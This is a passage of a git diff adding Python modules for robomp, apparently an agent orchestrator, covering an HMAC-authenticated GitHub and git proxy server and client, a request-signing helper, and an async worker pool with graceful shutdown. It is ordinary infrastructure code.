GitHubClient = request.app.state.github + try: + info = await github.get_pull_request(repo, number) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse(_serialize(info)) + + @app.get("/gh/v1/issues") + async def list_issues(request: Request, repo: str, state: str = "open", limit: int = 30) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + items = await github.list_issues(repo, state=state, limit=limit) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"items": [_serialize(s) for s in items]}) + + @app.get("/gh/v1/comments") + async def list_comments(request: Request, repo: str, number: int) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + items = await github.list_comments(repo, number) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"items": [_serialize(c) for c in items]}) + + @app.get("/gh/v1/review_comments") + async def list_review_comments(request: Request, repo: str, pr_number: int) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + items = await github.list_review_comments(repo, pr_number) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"items": [_serialize(c) for c in items]}) + + @app.get("/gh/v1/pr_reviews") + async def list_pr_reviews(request: Request, repo: str, pr_number: int) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + items = await github.list_pr_reviews(repo, pr_number) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"items": [_serialize(r) for r in items]}) + + # ---- writes ---- + async def _json_body(request: Request) -> dict[str, Any]: + await _authenticate(request) + try: + data = await request.json() + except Exception as exc: + raise HTTPException(400, f"invalid json: {exc}") from exc + if not isinstance(data, dict): + raise HTTPException(400, "json body must be an object") + return data + + @app.post("/gh/v1/post_comment") + async def post_comment(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + number = _require_int(data.get("number"), "number") + body = _require_str(data.get("body"), "body") + github: GitHubClient = request.app.state.github + try: + info = await github.post_comment(repo, number, body) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse(_serialize(info)) + + @app.post("/gh/v1/open_pull_request") + async def open_pull_request(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + head = _require_str(data.get("head"), "head") + base = _require_str(data.get("base"), "base") + title = _require_str(data.get("title"), "title") + body = _require_str(data.get("body"), "body") + draft = bool(data.get("draft", False)) + mcm = bool(data.get("maintainer_can_modify", True)) + github: GitHubClient = request.app.state.github + try: + pr = await github.open_pull_request( + repo=repo, + head=head, + base=base, + title=title, + body=body, + draft=draft, + maintainer_can_modify=mcm, + ) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse(_serialize(pr)) + + @app.post("/gh/v1/request_reviewers") + async def request_reviewers(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + pr_number = _require_int(data.get("pr_number"), "pr_number") + reviewers = _optional_str_list(data.get("reviewers"), "reviewers") + team_reviewers = _optional_str_list(data.get("team_reviewers"), "team_reviewers") + github: GitHubClient = request.app.state.github + try: + await github.request_reviewers( + repo=repo, + pr_number=pr_number, + reviewers=reviewers, + team_reviewers=team_reviewers, + ) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"ok": True}) + + @app.post("/gh/v1/add_issue_labels") + async def add_issue_labels(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + number = _require_int(data.get("number"), "number") + labels = _optional_str_list(data.get("labels"), "labels") or [] + github: GitHubClient = request.app.state.github + try: + applied = await github.add_issue_labels(repo, number, labels) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"labels": list(applied)}) + + @app.post("/gh/v1/add_assignees") + async def add_assignees(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + number = _require_int(data.get("number"), "number") + assignees = _optional_str_list(data.get("assignees"), "assignees") or [] + github: GitHubClient = request.app.state.github + try: + await github.add_assignees(repo, number, assignees) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"ok": True}) + + @app.get("/gh/v1/comment_reactions") + async def list_comment_reactions(request: Request, repo: str, comment_id: int) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + reactions = await github.list_comment_reactions(repo, comment_id) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"items": [_serialize(r) for r in reactions]}) + + @app.post("/gh/v1/close_issue") + async def close_issue(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + number = _require_int(data.get("number"), "number") + reason_raw = data.get("reason") + reason = reason_raw if isinstance(reason_raw, str) and reason_raw else "completed" + github: GitHubClient = request.app.state.github + try: + await github.close_issue(repo, number, reason=reason) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"ok": True}) + + # ---- git transport ---- + # + # The underlying `robomp.git_ops` primitives are blocking `subprocess.run` + # calls. Running them directly from an `async def` handler pins the + # event loop until the subprocess returns; a hung git would freeze the + # whole proxy. We bridge with `asyncio.to_thread` (work on a threadpool + # worker) wrapped in `asyncio.wait_for` (hard wall-clock cap, returns + # 504 on timeout). The subprocess itself can outlive the timeout — a + # proper subprocess.kill plumbing would have to live inside + # `git_ops._run_git`; flagged for follow-up. + + async def _run_git_op(fn, *args, **kwargs): # type: ignore[no-untyped-def] + try: + return await asyncio.wait_for( + asyncio.to_thread(fn, *args, **kwargs), + timeout=settings.gh_proxy_git_timeout_seconds, + ) + except TimeoutError as exc: + log.warning( + "gh-proxy: git op exceeded timeout", + extra={"op": fn.__name__, "timeout": settings.gh_proxy_git_timeout_seconds}, + ) + raise HTTPException(504, f"git {fn.__name__} timed out") from exc + + @app.post("/gh/v1/git/clone") + async def git_clone_endpoint(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + clone_url = _require_str(data.get("clone_url"), "clone_url") + default_branch = _require_str(data.get("default_branch"), "default_branch") + target = _pool_dir(settings, repo) + try: + await _run_git_op( + git_clone, + target, + clone_url=clone_url, + default_branch=default_branch, + token=_resolve_token(settings), + ) + except GitCommandError as exc: + return _git_error_response(exc) + return JSONResponse({"pool_dir": str(target)}) + + @app.post("/gh/v1/git/fetch") + async def git_fetch_endpoint(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + target = _pool_dir(settings, repo) + try: + await _run_git_op(git_fetch_prune, target, token=_resolve_token(settings)) + except GitCommandError as exc: + return _git_error_response(exc) + return JSONResponse({"pool_dir": str(target)}) + + @app.post("/gh/v1/git/fetch_ref") + async def git_fetch_ref_endpoint(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + ref = _require_str(data.get("ref"), "ref") + target = _pool_dir(settings, repo) + # fetch_ref is intentionally best-effort; never surfaces a 5xx. + await _run_git_op(git_fetch_ref, target, ref, token=_resolve_token(settings)) + return JSONResponse({"pool_dir": str(target)}) + + @app.post("/gh/v1/git/push") + async def git_push_endpoint(request: Request) -> JSONResponse: + data = await _json_body(request) + repo = _require_str(data.get("repo"), "repo") + workspace_key = _require_str(data.get("workspace_key"), "workspace_key") + branch = _require_str(data.get("branch"), "branch") + expected_head = _require_str(data.get("expected_head"), "expected_head") + slot_uid = _optional_slot_uid(data.get("slot_uid")) + # Sanity-check workspace_key matches the repo claim. + expected_prefix = repo.replace("/", "__") + "__" + if not workspace_key.startswith(expected_prefix): + raise HTTPException(400, "workspace_key does not match repo") + repo_dir = _workspace_repo_dir(settings, workspace_key) + if not repo_dir.is_dir(): + raise HTTPException(404, f"workspace not found: {workspace_key}") + # Block attacker-controlled `origin` from being a PAT exfil channel. + # MUST run BEFORE any subprocess that would inject the token header. + await asyncio.to_thread(_assert_origin_safe_for_repo, repo_dir, repo, slot_uid) + try: + result = await _run_git_op( + git_push, + repo_dir, + branch=branch, + expected_head=expected_head, + token=_resolve_token(settings), + slot_uid=slot_uid, + ) + except HeadDriftError as exc: + return _git_error_response(exc, head_drift=True) + except GitCommandError as exc: + return _git_error_response(exc) + return JSONResponse({"head": result.head, "branch": result.branch}) + + # Expose for tests + app.state.workspace_key_fn = compute_workspace_key # type: ignore[attr-defined] + return app + + +__all__ = ["create_proxy_app"] diff --git a/python/robomp/src/proxy_client.py b/python/robomp/src/proxy_client.py new file mode 100644 index 000000000..5d8e8429b --- /dev/null +++ b/python/robomp/src/proxy_client.py @@ -0,0 +1,495 @@ +"""Client half of the roboomp ↔ gh-proxy channel. + +`GitHubProxyClient` implements `GitHubBackend` by HMAC-signing each request +and forwarding to gh-proxy. `ProxyGitTransport` implements `GitTransport` by +routing clone/fetch/push through the proxy too — roboomp never holds the PAT. + +Both classes share an `httpx.AsyncClient` + `httpx.Client` against the proxy. +Tests can inject a custom transport (`httpx.MockTransport` or `ASGITransport`) +to short-circuit the network. +""" + +from __future__ import annotations + +import json +import logging +from collections.abc import Mapping +from pathlib import Path +from typing import Any + +import httpx + +from robomp.git_ops import GitCommandError, HeadDriftError, PushResult +from robomp.github_client import ( + CommentInfo, + GitHubError, + IssueInfo, + IssueSummary, + PullRequestInfo, + PullRequestReviewInfo, + ReactionInfo, + RepoInfo, + ReviewCommentInfo, +) +from robomp.proxy_hmac import HEADER_SIGNATURE, HEADER_TIMESTAMP, sign + +log = logging.getLogger(__name__) + + +# ---------- error decoding ---------- + + +def _decode_error(resp: httpx.Response) -> Exception: + """Map a non-2xx response from gh-proxy back to a domain exception. + + Proxy errors wrap the GitHub or git failure in `{"error": {...}}`. + Anything else is collapsed to a generic GitHubError-shaped exception + so callers see a consistent surface. + """ + body: Any + try: + body = resp.json() + except Exception: + body = None + if isinstance(body, dict) and isinstance(body.get("error"), dict): + err = body["error"] + kind = err.get("kind") + if kind == "github": + return GitHubError( + int(err.get("status") or resp.status_code), + str(err.get("message") or "github error"), + retry_after=err.get("retry_after"), + ) + if kind in ("git", "head_drift"): + cmd = err.get("cmd") or ["git"] + stdout = str(err.get("stdout") or "") + stderr = str(err.get("stderr") or "") + returncode = int(err.get("returncode") or 1) + klass = HeadDriftError if kind == "head_drift" else GitCommandError + return klass(list(cmd), returncode, stdout, stderr) + return GitHubError(resp.status_code, resp.text or "proxy error") + + +# ---------- signing helpers ---------- + + +def _signed_headers(method: str, target: str, body: bytes, key: bytes) -> dict[str, str]: + """Return signing headers for an already-canonicalized request target. + + `target` is `path` for query-less requests and `path?query` for GETs + that carry parameters. It MUST byte-for-byte match the server-side + `_request_target(request)` so HMAC verification succeeds — that's why + the async path below builds an `httpx.Request` first and reads the + encoded URL back out rather than re-encoding params here. + """ + ts, sig = sign(method=method, path=target, body=body, key=key) + return {HEADER_TIMESTAMP: ts, HEADER_SIGNATURE: sig} + + +# ---------- GitHubProxyClient ---------- + + +class GitHubProxyClient: + """HMAC-signed REST client speaking to a `robomp.proxy.server` instance. + + Implements `GitHubBackend` (duck-typed). Returns the same typed + dataclasses as the in-process `GitHubClient`, so call sites in worker, + tasks, host_tools, server, and CLI work unchanged. + """ + + def __init__( + self, + *, + base_url: str, + hmac_key: str | bytes, + transport: httpx.BaseTransport | httpx.AsyncBaseTransport | None = None, + timeout: float = 30.0, + ) -> None: + self._base_url = base_url.rstrip("/") + self._key = hmac_key.encode("utf-8") if isinstance(hmac_key, str) else hmac_key + self._transport = transport + self._timeout = httpx.Timeout(timeout, connect=10.0) + + def _async_client(self) -> httpx.AsyncClient: + return httpx.AsyncClient( + base_url=self._base_url, + transport=self._transport, # type: ignore[arg-type] + timeout=self._timeout, + ) + + async def _request( + self, + method: str, + path: str, + *, + params: Mapping[str, Any] | None = None, + json_body: Mapping[str, Any] | None = None, + ) -> Any: + body_bytes = b"" if json_body is None else json.dumps(json_body).encode("utf-8") + async with self._async_client() as client: + # Build the request first so httpx canonicalizes the URL once; + # we then sign against the encoded query string the wire will + # carry. Signing before this point would mean re-implementing + # httpx's param encoding, with a high risk of byte-level drift + # from the server's `request.url.query`. + req = client.build_request( + method, + path, + params=params, + content=body_bytes if json_body is not None else None, + ) + target = req.url.path + if req.url.query: + target = f"{target}?{req.url.query.decode('ascii')}" + req.headers.update(_signed_headers(method, target, body_bytes, self._key)) + if json_body is not None: + req.headers["Content-Type"] = "application/json" + resp = await client.send(req) + if resp.status_code >= 400: + raise _decode_error(resp) + if resp.status_code == 204 or not resp.content: + return None + return resp.json() + + # ---- reads ---- + async def get_repo(self, repo: str) -> RepoInfo: + data = await self._request("GET", "/gh/v1/repo", params={"repo": repo}) + return _repo_from(data) + + async def get_issue(self, repo: str, number: int) -> IssueInfo: + data = await self._request("GET", "/gh/v1/issue", params={"repo": repo, "number": number}) + return _issue_from(data) + + async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]: + data = await self._request("GET", "/gh/v1/closing_prs", params={"repo": repo, "number": number}) + items = data.get("pr_numbers") if isinstance(data, dict) else None + return tuple(int(n) for n in items or () if isinstance(n, int)) + + async def get_pull_request(self, repo: str, number: int) -> PullRequestInfo: + data = await self._request("GET", "/gh/v1/pull_request", params={"repo": repo, "number": number}) + return _pr_from(data) + + async def list_issues( + self, + repo: str, + *, + state: str = "open", + limit: int = 30, + ) -> list[IssueSummary]: + data = await self._request( + "GET", + "/gh/v1/issues", + params={"repo": repo, "state": state, "limit": limit}, + ) + return [_issue_summary_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []] + + async def list_comments(self, repo: str, number: int) -> list[CommentInfo]: + data = await self._request("GET", "/gh/v1/comments", params={"repo": repo, "number": number}) + return [_comment_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []] + + async def list_review_comments(self, repo: str, pr_number: int) -> list[ReviewCommentInfo]: + data = await self._request( + "GET", + "/gh/v1/review_comments", + params={"repo": repo, "pr_number": pr_number}, + ) + return [_review_comment_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []] + + async def list_pr_reviews(self, repo: str, pr_number: int) -> list[PullRequestReviewInfo]: + data = await self._request( + "GET", + "/gh/v1/pr_reviews", + params={"repo": repo, "pr_number": pr_number}, + ) + return [_pr_review_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []] + + async def get_authenticated_login(self) -> str: + data = await self._request("GET", "/gh/v1/authenticated_login") + return str(data["login"]) if isinstance(data, dict) else "" + + # ---- writes ---- + async def post_comment(self, repo: str, number: int, body: str) -> CommentInfo: + data = await self._request( + "POST", + "/gh/v1/post_comment", + json_body={"repo": repo, "number": number, "body": body}, + ) + return _comment_from(data) + + async def open_pull_request( + self, + *, + repo: str, + head: str, + base: str, + title: str, + body: str, + draft: bool = False, + maintainer_can_modify: bool = True, + ) -> PullRequestInfo: + data = await self._request( + "POST", + "/gh/v1/open_pull_request", + json_body={ + "repo": repo, + "head": head, + "base": base, + "title": title, + "body": body, + "draft": draft, + "maintainer_can_modify": maintainer_can_modify, + }, + ) + return _pr_from(data) + + async def request_reviewers( + self, + *, + repo: str, + pr_number: int, + reviewers: list[str] | None = None, + team_reviewers: list[str] | None = None, + ) -> None: + if not reviewers and not team_reviewers: + return + await self._request( + "POST", + "/gh/v1/request_reviewers", + json_body={ + "repo": repo, + "pr_number": pr_number, + "reviewers": reviewers, + "team_reviewers": team_reviewers, + }, + ) + + async def add_issue_labels(self, repo: str, number: int, labels: list[str]) -> tuple[str, ...]: + if not labels: + return () + data = await self._request( + "POST", + "/gh/v1/add_issue_labels", + json_body={"repo": repo, "number": number, "labels": labels}, + ) + return tuple(str(lbl) for lbl in (data.get("labels") if isinstance(data, dict) else None) or []) + + async def add_assignees(self, repo: str, number: int, assignees: list[str]) -> None: + if not assignees: + return + await self._request( + "POST", + "/gh/v1/add_assignees", + json_body={"repo": repo, "number": number, "assignees": assignees}, + ) + + async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]: + data = await self._request( + "GET", + "/gh/v1/comment_reactions", + params={"repo": repo, "comment_id": comment_id}, + ) + items = data.get("items") if isinstance(data, dict) else None + return tuple(_reaction_from(item) for item in items or ()) + + async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None: + await self._request( + "POST", + "/gh/v1/close_issue", + json_body={"repo": repo, "number": number, "reason": reason}, + ) + + +# ---------- ProxyGitTransport ---------- + + +class ProxyGitTransport: + """Routes clone/fetch/push to gh-proxy over the same HMAC channel. + + Uses a synchronous httpx client because the SandboxManager call sites + are synchronous; the proxy itself is asynchronous internally but we + bridge with a one-shot sync request per call. + """ + + __slots__ = ("_base_url", "_key", "_transport", "_timeout") + + def __init__( + self, + *, + base_url: str, + hmac_key: str | bytes, + transport: httpx.BaseTransport | None = None, + timeout: float = 120.0, + ) -> None: + self._base_url = base_url.rstrip("/") + self._key = hmac_key.encode("utf-8") if isinstance(hmac_key, str) else hmac_key + self._transport = transport + self._timeout = httpx.Timeout(timeout, connect=10.0) + + def _client(self) -> httpx.Client: + return httpx.Client( + base_url=self._base_url, + transport=self._transport, + timeout=self._timeout, + ) + + def _post(self, path: str, body: Mapping[str, Any]) -> Mapping[str, Any]: + body_bytes = json.dumps(body).encode("utf-8") + headers = _signed_headers("POST", path, body_bytes, self._key) + headers["Content-Type"] = "application/json" + with self._client() as client: + resp = client.request("POST", path, content=body_bytes, headers=headers) + if resp.status_code >= 400: + raise _decode_error(resp) + if resp.status_code == 204 or not resp.content: + return {} + data = resp.json() + return data if isinstance(data, dict) else {} + + def clone_pool(self, *, repo: str, clone_url: str, default_branch: str, target: Path) -> None: + del target # remote-resolved on the proxy side from `repo` + self._post( + "/gh/v1/git/clone", + {"repo": repo, "clone_url": clone_url, "default_branch": default_branch}, + ) + + def fetch_pool(self, *, repo: str, pool_dir: Path) -> None: + del pool_dir + self._post("/gh/v1/git/fetch", {"repo": repo}) + + def fetch_base_ref(self, *, repo: str, pool_dir: Path, ref: str) -> None: + del pool_dir + self._post("/gh/v1/git/fetch_ref", {"repo": repo, "ref": ref}) + + def push_branch( + self, + *, + repo: str, + workspace_key: str, + repo_dir: Path, + branch: str, + expected_head: str, + slot_uid: int | None = None, + ) -> PushResult: + del repo_dir + body: dict[str, Any] = { + "repo": repo, + "workspace_key": workspace_key, + "branch": branch, + "expected_head": expected_head, + } + if slot_uid is not None: + body["slot_uid"] = slot_uid + data = self._post("/gh/v1/git/push", body) + return PushResult(head=str(data.get("head") or expected_head), branch=str(data.get("branch") or branch)) + + +# ---------- payload helpers ---------- + + +def _repo_from(data: Any) -> RepoInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed repo payload") + return RepoInfo( + full_name=str(data["full_name"]), + default_branch=str(data["default_branch"]), + clone_url=str(data["clone_url"]), + private=bool(data.get("private", False)), + ) + + +def _issue_from(data: Any) -> IssueInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed issue payload") + labels = data.get("labels") or [] + return IssueInfo( + repo=str(data["repo"]), + number=int(data["number"]), + title=str(data.get("title") or ""), + body=str(data.get("body") or ""), + state=str(data.get("state") or "open"), + author=str(data.get("author") or ""), + labels=tuple(str(x) for x in labels), + is_pull_request=bool(data.get("is_pull_request", False)), + ) + + +def _issue_summary_from(data: Any) -> IssueSummary: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed issue summary payload") + return IssueSummary( + repo=str(data["repo"]), + number=int(data["number"]), + title=str(data.get("title") or ""), + state=str(data.get("state") or ""), + author=str(data.get("author") or ""), + labels=tuple(str(x) for x in (data.get("labels") or [])), + comments=int(data.get("comments") or 0), + updated_at=str(data.get("updated_at") or ""), + created_at=str(data.get("created_at") or ""), + html_url=str(data.get("html_url") or ""), + ) + + +def _comment_from(data: Any) -> CommentInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed comment payload") + return CommentInfo( + id=int(data["id"]), + author=str(data.get("author") or ""), + body=str(data.get("body") or ""), + created_at=str(data.get("created_at") or ""), + ) + + +def _reaction_from(data: Any) -> ReactionInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed reaction payload") + return ReactionInfo( + content=str(data.get("content") or ""), + user_login=str(data.get("user_login") or ""), + user_type=str(data.get("user_type") or ""), + ) + + +def _review_comment_from(data: Any) -> ReviewCommentInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed review_comment payload") + line = data.get("line") + return ReviewCommentInfo( + id=int(data.get("id") or 0), + author=str(data.get("author") or ""), + body=str(data.get("body") or ""), + path=str(data.get("path") or ""), + line=line if isinstance(line, int) else None, + created_at=str(data.get("created_at") or ""), + ) + + +def _pr_review_from(data: Any) -> PullRequestReviewInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed pr_review payload") + return PullRequestReviewInfo( + id=int(data.get("id") or 0), + author=str(data.get("author") or ""), + body=str(data.get("body") or ""), + state=str(data.get("state") or ""), + submitted_at=str(data.get("submitted_at") or ""), + ) + + +def _pr_from(data: Any) -> PullRequestInfo: + if not isinstance(data, dict): + raise GitHubError(500, "proxy returned malformed pr payload") + return PullRequestInfo( + repo=str(data["repo"]), + number=int(data["number"]), + html_url=str(data["html_url"]), + head_ref=str(data.get("head_ref") or ""), + base_ref=str(data.get("base_ref") or ""), + state=str(data.get("state") or "open"), + author=str(data.get("author") or ""), + head_repo=str(data.get("head_repo") or ""), + ) + + +__all__ = ["GitHubProxyClient", "ProxyGitTransport"] diff --git a/python/robomp/src/proxy_hmac.py b/python/robomp/src/proxy_hmac.py new file mode 100644 index 000000000..da39059f8 --- /dev/null +++ b/python/robomp/src/proxy_hmac.py @@ -0,0 +1,98 @@ +"""Shared HMAC signing/verification for the roboomp ↔ gh-proxy channel. + +Roboomp signs every request to gh-proxy with an HMAC-SHA256 over +`(method, path, timestamp, sha256(body))`. The shared secret never leaves +either container's memory, and the ±skew window bounds the replay surface. +""" + +from __future__ import annotations + +import hashlib +import hmac +import time +from typing import NamedTuple + +# Headers on every roboomp→gh-proxy request. +HEADER_TIMESTAMP = "X-Robomp-Timestamp" # unix seconds, integer string +HEADER_SIGNATURE = "X-Robomp-Sig" # hex-encoded HMAC-SHA256 + +# ±skew permits modest clock drift while keeping the replay window small. +DEFAULT_SKEW_SECONDS = 30 + + +def _string_to_sign(method: str, path: str, timestamp: str, body: bytes) -> bytes: + return b"\n".join( + ( + method.upper().encode("ascii"), + path.encode("utf-8"), + timestamp.encode("ascii"), + hashlib.sha256(body or b"").hexdigest().encode("ascii"), + ) + ) + + +def sign( + *, + method: str, + path: str, + body: bytes, + key: bytes, + timestamp: str | None = None, +) -> tuple[str, str]: + """Return `(timestamp, signature_hex)` for the given request shape. + + `timestamp` may be supplied explicitly (replay tests); otherwise the + current unix epoch in integer seconds is used. `path` MUST be the URL + path-only portion (no scheme, host, or query string trimming) so client + and server agree on the canonical form. + """ + ts = timestamp if timestamp is not None else str(int(time.time())) + sig = hmac.new(key, _string_to_sign(method, path, ts, body), hashlib.sha256).hexdigest() + return ts, sig + + +class VerifyResult(NamedTuple): + ok: bool + reason: str + + +def verify( + *, + method: str, + path: str, + body: bytes, + timestamp: str | None, + signature: str | None, + key: bytes, + now: float | None = None, + skew: int = DEFAULT_SKEW_SECONDS, +) -> VerifyResult: + """Validate an incoming request. Returns `(ok, reason)`. + + Any malformed input returns ok=False with a short reason. The reason + string is suitable for logging but should NOT be echoed back to the + caller (it leaks whether the failure was timestamp vs signature). + """ + if not timestamp or not signature: + return VerifyResult(False, "missing signature headers") + try: + ts_int = int(timestamp) + except ValueError: + return VerifyResult(False, "malformed timestamp") + now_int = int(now if now is not None else time.time()) + if abs(now_int - ts_int) > skew: + return VerifyResult(False, "timestamp outside skew window") + expected = hmac.new(key, _string_to_sign(method, path, timestamp, body), hashlib.sha256).hexdigest() + if not hmac.compare_digest(expected, signature): + return VerifyResult(False, "signature mismatch") + return VerifyResult(True, "") + + +__all__ = [ + "DEFAULT_SKEW_SECONDS", + "HEADER_SIGNATURE", + "HEADER_TIMESTAMP", + "VerifyResult", + "sign", + "verify", +] diff --git a/python/robomp/src/py.typed b/python/robomp/src/py.typed new file mode 100644 index 000000000..e69de29bb diff --git a/python/robomp/src/queue.py b/python/robomp/src/queue.py new file mode 100644 index 000000000..4b90a96d7 --- /dev/null +++ b/python/robomp/src/queue.py @@ -0,0 +1,409 @@ +"""Async worker pool draining the durable sqlite event queue.""" + +from __future__ import annotations + +import asyncio +import logging +import os +import traceback +from collections.abc import Callable +from contextlib import suppress + +from robomp import tasks +from robomp.cancellation import clear_current_event, set_current_event +from robomp.config import Settings +from robomp.db import Database, EventRow +from robomp.github_backend import GitHubBackend +from robomp.sandbox import GitTransport, SandboxManager, _reap_slot +from robomp.slot_pool import SlotPool + +log = logging.getLogger(__name__) + + +class WorkerPool: + """Long-lived dispatcher: drains queued events into per-task coroutines.""" + + def __init__( + self, + *, + settings: Settings, + db: Database, + github: GitHubBackend, + sandbox: SandboxManager, + git_transport: GitTransport, + slot_pool: SlotPool | None = None, + ) -> None: + self.settings = settings + self.db = db + self.github = github + self.sandbox = sandbox + self.git_transport = git_transport + self._workers: list[asyncio.Task[None]] = [] + self._wakeup = asyncio.Event() + self._stop = asyncio.Event() + self._slot_pool: SlotPool | None + self._semaphore: asyncio.Semaphore | None + if slot_pool is not None: + self._slot_pool = slot_pool + self._semaphore = None + elif os.geteuid() == 0: + self._slot_pool = SlotPool(range(2001, 2001 + settings.max_concurrency)) + self._semaphore = None + else: + self._slot_pool = None + self._semaphore = asyncio.Semaphore(settings.max_concurrency) + self._inflight: set[str] = set() + self._inflight_lock = asyncio.Lock() + # Cancellation: workers register a stop hook via the contextvar helpers + # in this module; the API surface fires them on demand. Plain dict/set + # are GIL-safe for single-key ops, which is all we do. + self._cancel_hooks: dict[str, Callable[[], None]] = {} + self._cancelled: set[str] = set() + # Phase B (graceful shutdown): track each spawned `_run_event` task so + # `stop()` can drain in-flight work, and a flag the exception path + # checks to avoid marking shutdown-interrupted rows as `failed` (we + # want them to stay `running` so `reset_stuck_running()` requeues + # them on next start; the agent then resumes via `--continue`). + self._inflight_tasks: dict[asyncio.Task[None], str] = {} + self._shutting_down: bool = False + # Deliveries whose `_run_event` we deliberately interrupted via + # `stop()` (either by firing the registered cancel hook or by + # cancelling the asyncio task itself). The exception path uses + # this — NOT `_shutting_down` — to decide whether to suppress + # `mark_event(..., 'failed')`. Without this distinction, an + # unrelated dispatch failure during the drain window would be + # silently masked and requeued as if nothing went wrong. + self._shutdown_cancelled: set[str] = set() + + def wake(self) -> None: + """Signal that new work is available.""" + self._wakeup.set() + + async def inflight_snapshot(self) -> list[str]: + """Return a stable, sorted snapshot of currently in-flight issue keys.""" + async with self._inflight_lock: + return sorted(self._inflight) + + async def _reap_all_slots(self) -> None: + if self._slot_pool is None: + return + await asyncio.gather(*(asyncio.to_thread(_reap_slot, uid) for uid in self._slot_pool.slot_uids)) + + async def start(self) -> None: + await self._reap_all_slots() + recovered = self.db.reset_stuck_running() + if recovered: + log.info("recovered stuck events", extra={"count": recovered}) + # Single dispatcher loop is simpler than N workers; concurrency is gated by the slot pool. + self._workers.append(asyncio.create_task(self._dispatch_loop(), name="robomp-dispatch")) + # Periodic natives-cache GC, if enabled. Sleep-first so a freshly + # restarted orchestrator doesn't burn CPU on a cold cache. + if self.sandbox.natives_cache is not None and self.settings.natives_cache_gc_interval_seconds > 0: + self._workers.append(asyncio.create_task(self._natives_cache_gc_loop(), name="robomp-natives-gc")) + + async def stop(self, *, drain_timeout: float = 25.0, kill_timeout: float = 5.0) -> None: + """Halt the dispatcher, then drain (or kill) in-flight `_run_event` tasks. + + Cleanly interrupted tasks intentionally leave their DB row in + `running` so the next `WorkerPool.start()` re-queues them via + `reset_stuck_running()`. The resumed omp session then picks up via + `--continue` from the persisted JSONL transcript. + """ + self._shutting_down = True + self._stop.set() + self._wakeup.set() + # 1. Halt the dispatcher (no new claims). + for worker in self._workers: + worker.cancel() + for worker in self._workers: + with suppress(asyncio.CancelledError): + await worker + self._workers.clear() + # 2. Give in-flight tasks a chance to drain. + pending = list(self._inflight_tasks) + if not pending: + return + log.info("draining in-flight tasks", extra={"count": len(pending), "timeout": drain_timeout}) + _, still_running = await asyncio.wait(pending, timeout=drain_timeout) + if not still_running: + return + # 3. Time's up — for every still-running task: fire its cancel hook + # if one was registered (kills the omp subprocess); otherwise + # cancel the asyncio task itself so a worker stuck pre-hook + # (e.g. waiting on the slot pool or inside RpcClient.__enter__) + # cannot proceed to spawn a fresh subprocess after stop() + # returns. Either way we record the delivery id in + # `_shutdown_cancelled` so `_run_event`'s exception path + # suppresses `mark_event(..., 'failed')` for that row only. + log.warning("shutdown timeout; interrupting in-flight tasks", extra={"count": len(still_running)}) + for task in still_running: + delivery_id = self._inflight_tasks.get(task) + if delivery_id is None: + # Task was already finalizing; nothing left to interrupt. + task.cancel() + continue + self._shutdown_cancelled.add(delivery_id) + hook = self._cancel_hooks.pop(delivery_id, None) + if hook is not None: + try: + await asyncio.to_thread(hook) + except Exception: + log.exception("shutdown hook raised", extra={"delivery": delivery_id}) + continue + # No hook armed yet — the worker hasn't reached the omp spawn + # point. Cancel the asyncio task directly so its body cannot + # run past stop(). + task.cancel() + # 4. Brief wait for the exception path / cancellation to settle. + with suppress(TimeoutError): + await asyncio.wait(still_running, timeout=kill_timeout) + + async def _natives_cache_gc_loop(self) -> None: + """Periodic sweep over every per-repo cache directory. + + Each iteration sleeps the configured interval first, then runs the + synchronous GC on a worker thread. Cancellation is the only exit; + any per-sweep failure is logged and the loop continues. + """ + cache = self.sandbox.natives_cache + if cache is None: # pragma: no cover — checked by caller + return + interval = self.settings.natives_cache_gc_interval_seconds + log.info("natives_cache gc loop online", extra={"interval": interval}) + try: + while not self._stop.is_set(): + try: + await asyncio.wait_for(self._stop.wait(), timeout=interval) + return # stop was set during the wait + except TimeoutError: + pass + 